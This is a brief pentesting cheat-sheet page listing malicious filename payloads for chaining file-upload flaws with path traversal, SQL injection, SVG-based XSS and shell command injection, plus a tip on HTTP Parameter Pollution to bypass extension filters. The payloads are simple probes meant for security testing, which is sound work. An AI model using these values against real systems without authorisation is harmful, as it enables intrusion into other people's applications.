File Upload
1
Chaining file uploads with other vulns:-
2
3
Set filename to:-
4
5
> ../../../tmp/lol.png for path traversals
6
> sleep(10)-- -.jpg for SQLi.
7
> <svg onload=alert(document.comain)>.jpg/png for xss
8
> ; sleep 10; for command injections
Copied!
Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.
Last modified 6mo ago
Copy link